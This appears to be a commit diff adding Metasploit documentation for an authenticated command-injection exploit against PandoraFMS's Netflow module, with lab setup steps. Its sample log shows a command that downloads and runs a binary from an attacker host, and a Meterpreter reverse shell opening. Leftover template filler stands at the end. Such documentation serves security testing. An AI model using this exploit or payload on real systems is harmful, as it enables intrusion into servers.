|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +PandoraFMS offers multiple modules that can be turned on or off with an administrative account. |
| 4 | +One of them is Netflow, which is responsible for real-time network monitoring. |
| 5 | +It can collect network data and then report or dump it. |
| 6 | +Once Netflow is configured, it allows you to perform various tasks, such as viewing and exporting network data. |
| 7 | + |
| 8 | +The Netflow explorer contains a vulnerability when an unsanitized parameter from the Netflow configuration is placed into a string that gets executed using the exec() function. |
| 9 | + |
| 10 | +The PandoraFMS can be installed from [here](https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/777/Tarball/): |
| 11 | + |
| 12 | +1. Download vulnerable PandoraFMS |
| 13 | +2. Install webserver - Apache2, MySQL, PHP |
| 14 | +3. Following installation steps of PandoraFMS |
| 15 | +4. Run: `sudo apt install nfdump` |
| 16 | + |
| 17 | + |
| 18 | +## Verification Steps |
| 19 | + |
| 20 | +1. Install the application |
| 21 | +1. Start msfconsole |
| 22 | +1. Do: `use linux/http/pandora_fms_auth_netflow_rce` |
| 23 | +1. Do: `set rhosts [target IP]` |
| 24 | +1. Do: `set lhost [attacker IP]` |
| 25 | +1. Do: `set username [username]` |
| 26 | +1. Do: `set password [password]` |
| 27 | +1. Do: `run` |
| 28 | +1. You should get a shell. |
| 29 | + |
| 30 | +## Options |
| 31 | + |
| 32 | + |
| 33 | +### USERNAME |
| 34 | + |
| 35 | +Login username of existing user. |
| 36 | + |
| 37 | +### PASSWORD |
| 38 | + |
| 39 | +Login password of existing user. |
| 40 | + |
| 41 | +## Scenarios |
| 42 | + |
| 43 | +``` |
| 44 | +msf6 exploit(linux/http/pandora_fms_auth_netflow_rce) > set rhosts 192.168.168.146 |
| 45 | +msf6 exploit(linux/http/pandora_fms_auth_netflow_rce) > set PASSWORD pandora |
| 46 | +msf6 exploit(linux/http/pandora_fms_auth_netflow_rce) > set USERNAME admin |
| 47 | +msf6 exploit(linux/http/pandora_fms_auth_netflow_rce) > run verbose=true |
| 48 | +[*] Command to run on remote host: curl -so ./khZKmkFYijJ http://192.168.168.128:8080/M1We21fZKyvgtWK9IWStLA;chmod +x ./khZKmkFYijJ;./khZKmkFYijJ& |
| 49 | +[*] Fetch handler listening on 192.168.168.128:8080 |
| 50 | +[*] HTTP server started |
| 51 | +[*] Adding resource /M1We21fZKyvgtWK9IWStLA |
| 52 | +[*] Started reverse TCP handler on 192.168.168.128:4444 |
| 53 | +[*] 192.168.168.146:80 - Running automatic check ("set AutoCheck false" to disable) |
| 54 | +[*] 192.168.168.146:80 - Version 7.0.777 detected |
| 55 | +[+] 192.168.168.146:80 - The target is vulnerable. Vulnerable PandoraFMS version 7.0.777 detected |
| 56 | +[*] Client 192.168.168.146 requested /M1We21fZKyvgtWK9IWStLA |
| 57 | +[*] Sending payload to 192.168.168.146 (curl/7.68.0) |
| 58 | +[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 192.168.168.146:54980) at 2025-06-25 12:27:52 +0200 |
| 59 | +
|
| 60 | +meterpreter > sysinfo |
| 61 | +Computer : 192.168.168.146 |
| 62 | +OS : Ubuntu 20.04 (Linux 5.15.0-136-generic) |
| 63 | +Architecture : x64 |
| 64 | +BuildTuple : x86_64-linux-musl |
| 65 | +Meterpreter : x64/linux``` |
| 66 | +
|
| 67 | +For example: |
| 68 | +
|
| 69 | +To do this specific thing, here's how you do it: |
| 70 | +
|
| 71 | +``` |
| 72 | +msf > use module_name |
| 73 | +msf auxiliary(module_name) > set POWERLEVEL >9000 |
| 74 | +msf auxiliary(module_name) > exploit |
| 75 | +``` |
0 commit comments